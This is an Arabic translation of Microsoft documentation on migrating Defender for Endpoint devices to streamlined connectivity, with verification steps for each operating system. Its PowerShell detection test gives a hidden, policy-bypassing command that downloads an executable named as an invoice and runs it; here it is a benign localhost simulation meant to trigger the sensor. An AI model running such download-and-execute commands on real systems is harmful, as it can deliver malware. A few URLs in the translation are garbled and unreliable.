ترحيل الأجهزة لاستخدام أسلوب الاتصال المبسط

ينطبق على:

• الخطة 1 من Microsoft Defender لنقطة النهاية
• Defender for Endpoint الخطة 2
• Microsoft Defender XDR

توضح هذه المقالة كيفية ترحيل (إعادة إلحاق) الأجهزة التي تم إلحاقها مسبقا ب Defender لنقطة النهاية لاستخدام أسلوب اتصال الجهاز المبسط. لمزيد من المعلومات حول الاتصال المبسط، راجع إلحاق الأجهزة باستخدام الاتصال المبسط. يجب أن تفي الأجهزة بالمتطلبات الأساسية المدرجة في الاتصال المبسط.

في معظم الحالات، لا يكون إلغاء إلحاق الجهاز الكامل مطلوبا عند إعادة الإلحاق. يمكنك تشغيل حزمة الإلحاق المحدثة وإعادة تشغيل جهازك لتبديل الاتصال. راجع المعلومات التالية للحصول على تفاصيل حول أنظمة التشغيل الفردية.

هام

القيود والمشكلات المعروفة:

• وجدنا مشكلة خلفية في ملء ConnectivityType العمود في التتبع DeviceInfo table المتقدم بحيث يمكنك تتبع تقدم الترحيل. ونحن نهدف إلى حل هذه المشكلة في أقرب وقت ممكن.
• بالنسبة إلى عمليات ترحيل الجهاز (إعادة الإلحاق): لا يلزم إلغاء الإلحاق للتبديل إلى أسلوب اتصال مبسط. بمجرد تشغيل حزمة الإلحاق المحدثة، يلزم إعادة تشغيل جهاز كامل لأجهزة Windows وإعادة تشغيل الخدمة لنظامي macOS وLinux. لمزيد من المعلومات، راجع التفاصيل المضمنة في هذه المقالة.
• لا تدعم Windows 10 الإصدارات 1607 و1703 و1709 و1803 إعادة الإلحاق. إلغاء الإلحاق أولا ثم الإلحاق باستخدام الحزمة المحدثة. تتطلب هذه الإصدارات أيضا قائمة عناوين URL أطول.
• الأجهزة التي تشغل عامل MMA غير مدعومة ويجب أن تستمر في استخدام أسلوب إلحاق MMA.

ترحيل الأجهزة باستخدام الأسلوب المبسط

توصية الترحيل

• ابدأ صغيرا. يوصى بالبدء بمجموعة صغيرة من الأجهزة أولا. قم بتطبيق كائن ثنائي كبير الحجم للإلحاق باستخدام أي من أدوات التوزيع المدعومة، ثم راقب الاتصال. إذا كنت تستخدم نهج إلحاق جديد، لمنع التعارضات، فتأكد من استبعاد الجهاز من أي نهج إعداد موجودة أخرى.

• التحقق من الصحة والمراقبة. بعد إعداد المجموعة الصغيرة من الأجهزة، تحقق من أن الأجهزة قد تم إلحاقها بنجاح وتتواصل مع الخدمة.

• الترحيل الكامل. في هذه المرحلة، يمكنك طرح الترحيل تدريجيا إلى مجموعة أكبر من الأجهزة. لإكمال الترحيل، يمكنك استبدال نهج الإلحاق السابقة وإزالة عناوين URL القديمة من جهاز الشبكة.

التحقق من صحة المتطلبات الأساسية للجهاز قبل المتابعة مع أي عمليات ترحيل. تعتمد هذه المعلومات على المقالة السابقة من خلال التركيز على ترحيل الأجهزة الموجودة.

لإعادة إلحاق الأجهزة، تحتاج إلى استخدام حزمة الإعداد المبسطة. لمزيد من المعلومات حول كيفية الوصول إلى الحزمة، راجع الاتصال المبسط.

اعتمادا على نظام التشغيل، قد تتطلب عمليات الترحيل إعادة تشغيل الجهاز أو إعادة تشغيل الخدمة بمجرد تطبيق حزمة الإلحاق:

• Windows: إعادة تشغيل الجهاز

• macOS: أعد تشغيل الجهاز أو أعد تشغيل خدمة Defender لنقطة النهاية عن طريق تشغيل:

  1. sudo launchctl unload /Library/LaunchDaemons/com.microsoft.fresno.plist
  2. sudo launchctl load /Library/LaunchDaemons/com.microsoft.fresno.plist

• Linux: أعد تشغيل خدمة Defender لنقطة النهاية عن طريق تشغيل: sudo systemctl restart mdatp

يسرد الجدول التالي إرشادات الترحيل لأدوات الإلحاق المتوفرة استنادا إلى نظام تشغيل الجهاز.

Windows 10 و11

Windows 10 و11

هام

لا يدعم Windows 10 الإصدار 1607 و1703 و1709 و1803 إعادة الإلحاق. لترحيل الأجهزة الموجودة، ستحتاج إلى إلغاء الإعداد بالكامل وإلحاقها باستخدام حزمة الإعداد المبسطة.

للحصول على معلومات عامة حول إلحاق أجهزة عميل Windows، راجع إلحاق عميل Windows.

تأكد من استيفاء المتطلبات الأساسية: المتطلبات الأساسية لاستخدام الأسلوب المبسط.

البرنامج النصي المحلي

اتبع الإرشادات الواردة في البرنامج النصي المحلي (حتى 10 أجهزة) باستخدام حزمة الإعداد المبسطة. بعد إكمال الخطوات، يجب إعادة تشغيل الجهاز لاتصال الجهاز للتبديل.

نهج المجموعة

اتبع الإرشادات الواردة في نهج المجموعة باستخدام حزمة الإعداد المبسطة. بعد إكمال الخطوات، يجب إعادة تشغيل الجهاز لاتصال الجهاز للتبديل.

Microsoft Intune

اتبع الإرشادات الواردة في Intune باستخدام حزمة الإعداد المبسطة. يمكنك استخدام خيار "auto from connector"؛ ومع ذلك، لا يعيد هذا الخيار تطبيق حزمة الإعداد تلقائيا. الإنشاء نهج إلحاق جديد واستهدف مجموعة اختبار أولا. بعد إكمال الخطوات، يجب إعادة تشغيل الجهاز لاتصال الجهاز للتبديل.

Microsoft Configuration Manager

اتبع الإرشادات الواردة في Configuration Manager.

Vdi

استخدم الإرشادات في إلحاق أجهزة البنية الأساسية لسطح المكتب الظاهري (VDI) غير المستمرة. بعد إكمال الخطوات، يجب إعادة تشغيل الجهاز لاتصال الجهاز للتبديل.

Windows Server

Windows Server

للحصول على معلومات عامة حول إلحاق أجهزة خادم Windows، راجع إلحاق خوادم Windows بخدمة Microsoft Defender لنقطة النهاية.

تأكد من استيفاء المتطلبات الأساسية: المتطلبات الأساسية للأسلوب المبسط.

Microsoft Defender للسحابة

لا يتم إعادة إلحاق الأجهزة التي تم إلحاقها بالفعل تلقائيا. قم بتشغيل إعداد الميزة المتقدمة التالي في مدخل Microsoft Defender (إعدادات > نقاط > النهاية الميزات المتقدمة) وحدد الخيار "تطبيق إعدادات الاتصال المبسطة على الأجهزة التي يديرها Intune و Defender for Cloud". تبدأ الأجهزة المضافة حديثا باستخدام معلومات الإلحاق الجديدة في غضون حوالي 48 ساعة. لإعادة إلحاق الأجهزة الموجودة، قم بتطبيق البرنامج النصي للإلحاق - راجع إلحاق خوادم Windows بخدمة Microsoft Defender لنقطة النهاية.

Microsoft Configuration Manager

اتبع الإرشادات الواردة في Configuration Manager لنشر نهج جديد.

نهج المجموعة

اتبع الإرشادات الواردة في نهج المجموعة باستخدام حزمة الإعداد المبسطة. بعد إكمال الخطوات، يجب إعادة تشغيل الجهاز لاتصال الجهاز للتبديل.

Vdi

اتبع الإرشادات الواردة في إلحاق أجهزة البنية الأساسية لسطح المكتب الظاهري (VDI) غير المستمرة. بعد إكمال الخطوات، يجب إعادة تشغيل الجهاز لاتصال الجهاز للتبديل.

ماك

ماك

للحصول على معلومات عامة حول إلحاق أجهزة macOS، راجع Microsoft Defender لنقطة النهاية على macOS.

تأكد من استيفاء المتطلبات الأساسية: المتطلبات الأساسية للأسلوب المبسط.

البرنامج النصي المحلي

اتبع الإرشادات الواردة في النشر اليدوي Microsoft Defender لنقطة النهاية على macOS باستخدام حزمة الإعداد المبسطة.

بعد إكمال الخطوات، يجب إما إعادة تشغيل الجهاز أو إعادة تشغيل الخدمة للاتصال للتبديل.

Microsoft Intune

1. في Microsoft Intune، قم بإنشاء نهج إلحاق جديد باستخدام ملف تعريف التكوين المخصص. لا تقم بتعيينه بعد. اتبع الإرشادات الموجودة ضمن التوزيع المستند إلى Intune Microsoft Defender لنقطة النهاية على Mac.

2. استبعاد جهاز macOS الذي تقوم بإعادة إلحاقه من نهج الإلحاق الحالي الخاص به. لمعرفة المزيد حول استبعاد المجموعات من تعيينات النهج، راجع استبعاد المجموعات من تعيين نهج.

3. أضف تعيين النهج باستخدام حزمة إلحاق مبسطة.

4. إعادة تشغيل الجهاز.

JAMF Pro

1. استبعاد الجهاز من أي نهج "إلحاق" موجودة في JAMF Pro.

2. الإنشاء نهج إلحاق جديد لنهج الاتصال المبسط.

3. قم بتضمين الجهاز في نهج الإعداد المبسط الجديد.

4. إعادة تشغيل الجهاز إذا تم إلحاقه مسبقا ب Defender لنقطة النهاية. بدلا من ذلك، يمكنك إعادة تشغيل الخدمة باستخدام الأوامر التالية:

   1. sudo launchctl unload /Library/LaunchDaemons/com.microsoft.fresno.plist
   2. sudo launchctl load /Library/LaunchDaemons/com.microsoft.fresno.plist

لمزيد من إرشادات JAMF، راجع توزيع Microsoft Defender لنقطة النهاية على macOS باستخدام JAMF Pro.

ينكس

ينكس

للحصول على معلومات عامة حول إلحاق أجهزة Linux، راجع Microsoft Defender لنقطة النهاية على Linux.

تأكد من استيفاء المتطلبات الأساسية: المتطلبات الأساسية للأسلوب المبسط.

البرنامج النصي المحلي

استخدم الإرشادات الواردة في Deploy Microsoft Defender لنقطة النهاية على Linux يدويا باستخدام حزمة الإعداد المبسطة.

بعد إكمال الخطوات، يجب إما إعادة تشغيل الجهاز أو إعادة تشغيل الخدمة باستخدام sudo systemctl restart mdatp.

لا يبدأ اتصال الجهاز بالنهج المبسط إذا لم تقم بإعادة تشغيل الجهاز.

أدوات توزيع Linux التابعة لجهة خارجية (Puppet، Ansible، Chef)

استبدل ملف حزمة الإعداد في أسلوب التوزيع الحالي.

التحقق من اتصال الجهاز بطريقة مبسطة للأجهزة التي تم ترحيلها

يمكنك استخدام الطرق التالية للتحقق من أنك قمت بتوصيل أجهزة Windows بنجاح:

• محلل العميل
• التتبع مع التتبع المتقدم في Microsoft Defender XDR
• تتبع محليا باستخدام عارض الأحداث (لنظام التشغيل Windows)
• تشغيل الاختبارات لتأكيد الاتصال بخدمات Defender لنقطة النهاية
• التحقق من محرر السجل
• اختبار الكشف عن PowerShell

بالنسبة إلى macOS وLinux، يمكنك استخدام الطرق التالية:

• اختبارات اتصال MDATP
• التتبع مع التتبع المتقدم في Microsoft Defender XDR
• تشغيل الاختبارات لتأكيد الاتصال بخدمات Defender لنقطة النهاية

استخدام Defender for Endpoint Client Analyzer (Windows) للتحقق من صحة الاتصال بعد الإلحاق لنقاط النهاية التي تم ترحيلها

بمجرد الإلحاق، قم بتشغيل MDE Client Analyzer للتأكد من اتصال جهازك بعناوين URL المحدثة المناسبة.

قم بتنزيل أداة محلل العميل Microsoft Defender لنقطة النهاية حيث يتم تشغيل أداة استشعار Defender لنقطة النهاية.

يمكنك اتباع نفس الإرشادات كما هو الحال في التحقق من اتصال العميل بخدمة Microsoft Defender لنقطة النهاية. يستخدم البرنامج النصي تلقائيا حزمة الإعداد التي تم تكوينها على الجهاز (يجب أن يكون إصدارا مبسطا) لاختبار الاتصال.

تأكد من إنشاء الاتصال بعناوين URL المناسبة.

التتبع مع التتبع المتقدم في Microsoft Defender XDR

يمكنك استخدام التتبع المتقدم في مدخل Microsoft Defender لعرض حالة نوع الاتصال.

تم العثور على هذه المعلومات في جدول DeviceInfo ضمن العمود "ConnectivityType":

• اسم العمود: نوع الاتصال
• القيم المحتملة: <blank>، مبسطة، قياسية
• نوع البيانات: سلسلة
• الوصف: نوع الاتصال من الجهاز إلى السحابة

بمجرد ترحيل الجهاز لاستخدام الأسلوب المبسط وإنشاء الجهاز اتصالا ناجحا مع أمر EDR & قناة التحكم، يتم تمثيل القيمة على أنها "مبسطة".

إذا قمت بنقل الجهاز مرة أخرى إلى الأسلوب العادي، تكون القيمة "قياسية".

بالنسبة للأجهزة التي لم تحاول إعادة الإلحاق بعد، تظل القيمة فارغة.

التعقب محليا على جهاز من خلال Windows عارض الأحداث

يمكنك استخدام سجل تشغيل SENSE الخاص ب Windows عارض الأحداث للتحقق محليا من صحة الاتصالات باستخدام النهج المبسط الجديد. يتعقب معرف حدث SENSE 4 اتصالات EDR الناجحة.

افتح سجل أحداث خدمة Defender لنقطة النهاية باستخدام الخطوات التالية:

1. في قائمة Windows، حدد البدء، ثم اكتب عارض الأحداث. ثم حدد عارض الأحداث.

2. في قائمة السجل، ضمن ملخص السجل، مرر لأسفل حتى ترى Microsoft-Windows-SENSE/Operational. انقر نقرا مزدوجا فوق العنصر لفتح السجل.

   

   يمكنك أيضا الوصول إلى السجل عن طريق توسيعApplications and Services Logs>Microsoft>Windows>SENSE وتحديد Operational.

3. يتعقب معرف الحدث 4 الاتصالات الناجحة مع قناة التحكم في أمر Defender for Endpoint &. تحقق من الاتصالات الناجحة باستخدام عنوان URL المحدث. على سبيل المثال:

   Contacted server 6 times, all succeeded, URI: <region>.<geo>.endpoint.security.microsoft.com.
   <EventData>
    <Data Name="UInt1">6</Data>
    <Data Name="Message1">https://<region>.<geo>.endpoint.security.microsoft.com>
   </EventData>
   

4. تحتوي الرسالة 1 على عنوان URL الذي تم الاتصال به. تأكد من أن الحدث يتضمن عنوان URL المبسط (endpoint.security.microsoft، com).

5. يتعقب معرف الحدث 5 الأخطاء إذا كان ذلك ممكنا.

ملاحظة

SENSE هو الاسم الداخلي المستخدم للإشارة إلى أداة الاستشعار السلوكية التي تعمل على Microsoft Defender لنقطة النهاية.
ستظهر الأحداث المسجلة بواسطة الخدمة في السجل.
لمزيد من المعلومات، راجع مراجعة الأحداث والخطأ باستخدام عارض الأحداث.

تشغيل الاختبارات لتأكيد الاتصال بخدمات Defender لنقطة النهاية

بمجرد إلحاق الجهاز ب Defender لنقطة النهاية، تحقق من استمرار ظهوره في مخزون الجهاز. يجب أن يظل DeviceID كما هو.

تحقق من علامة التبويب المخطط الزمني لصفحة الجهاز للتأكد من تدفق الأحداث من الجهاز.

الاستجابة المباشرة

تأكد من أن Live Response تعمل على جهاز الاختبار الخاص بك. اتبع الإرشادات الواردة في التحقيق في الكيانات على الأجهزة التي تستخدم الاستجابة المباشرة.

تأكد من تشغيل أمرين أساسيين بعد الاتصال لتأكيد الاتصال (مثل القرص المضغوط والمهام والاتصال).

التحقيق التلقائي والاستجابة (AIR)

تأكد من أن التحقيق والاستجابة التلقائيين يعملان على جهاز الاختبار الخاص بك: تكوين قدرات التحقيق والاستجابة التلقائية.

بالنسبة لمختبرات اختبار وقت تشغيل التكامل التلقائي، انتقل إلى Microsoft Defender XDR>Evaluations & البرامج التعليمية>& المحاكاة> **البرامج التعليمية البرامج التعليمية> للتحقيق التلقائي.

الحماية المقدمة من السحابة

1. افتح موجه الأوامر كمسؤول.

2. انقر بزر الماوس الأيمن فوق العنصر في قائمة البدء، وحدد تشغيل كمسؤول ثم حدد نعم في مطالبة الأذونات.

3. استخدم الوسيطة التالية مع الأداة المساعدة لسطر الأوامر Microsoft Defender Antivirus (mpcmdrun.exe) للتحقق من أن شبكتك يمكنها الاتصال بخدمة سحابة برنامج الحماية من الفيروسات Microsoft Defender:

   "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -ValidateMapsConnection
   

ملاحظة

سيعمل هذا الأمر فقط على Windows 10 أو الإصدار 1703 أو أعلى أو Windows 11. لمزيد من المعلومات، راجع إدارة برنامج الحماية من الفيروسات Microsoft Defender باستخدام أداة سطر الأوامر mpcmdrun.exe.

كتلة الاختبار من النظرة الأولى

اتبع الإرشادات في العرض التوضيحي Microsoft Defender لنقطة النهاية Block at First Sight (BAFS).

اختبار SmartScreen

اتبع الإرشادات الواردة في Microsoft Defender SmartScreen Demo (msft.net).

اختبار الكشف عن PowerShell

1. على جهاز Windows، أنشئ مجلدا: C:\test-MDATP-test.

2. افتح موجه الأوامر كمسؤول.

3. في نافذة موجه الأوامر، قم بتشغيل أمر PowerShell التالي:

   powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
   

بعد تشغيل الأمر، يتم إغلاق نافذة موجه الأوامر تلقائيا. إذا نجحت، يتم وضع علامة على اختبار الكشف على أنه مكتمل.

بالنسبة إلى macOS وLinux، يمكنك استخدام الطرق التالية:

• اختبارات اتصال MDATP
• التتبع مع التتبع المتقدم في Microsoft Defender XDR
• تشغيل الاختبارات لتأكيد الاتصال بخدمات Defender لنقطة النهاية

اختبار اتصال MDATP (macOS وLinux)

قم بتشغيل mdatp health -details features لتأكيد simplified_connectivity: "ممكن".

التشغيل mdatp health -details edr للتأكيد edr_partner_geo_location متاح. يجب أن تكون القيمة حيث يكون GW_<geo> "الموقع الجغرافي" هو الموقع الجغرافي للمستأجر الخاص بك.

قم بتشغيل اختبار اتصال mdatp. تأكد من وجود نمط URL المبسط. يجب أن تتوقع اثنين ل '\storage'، أحدهما ل '\mdav'، والآخر ل '\xplat'، والآخر ل '/packages'.

على سبيل المثال: https:mdav.us.endpoint.security.microsoft/com/storage

التتبع مع التتبع المتقدم في Microsoft Defender XDR

اتبع الإرشادات نفسها المتوفرة في Windows.

استخدام Defender for Endpoint Client Analyzer (عبر النظام الأساسي) للتحقق من صحة الاتصال لنقاط النهاية التي تم ترحيلها حديثا

قم بتنزيل محلل العميل وتشغيله لنظام التشغيل macOS أو Linux. لمزيد من المعلومات، راجع تنزيل محلل العميل وتشغيله.

1. قم بتشغيل mdeclientanalyzer.cmd -o <path to cmd file> من داخل المجلد MDEClientAnalyzer. يستخدم الأمر معلمات من حزمة الإعداد لاختبار الاتصال.

2. تشغيل mdeclientanalyzer.cmd -g <GW_US, GW_UK, GW_EU> (حيث تكون المعلمة من GW_US، GW_EU، GW_UK). يشير GW إلى الخيار المبسط. تشغيل مع الموقع الجغرافي للمستأجر القابل للتطبيق.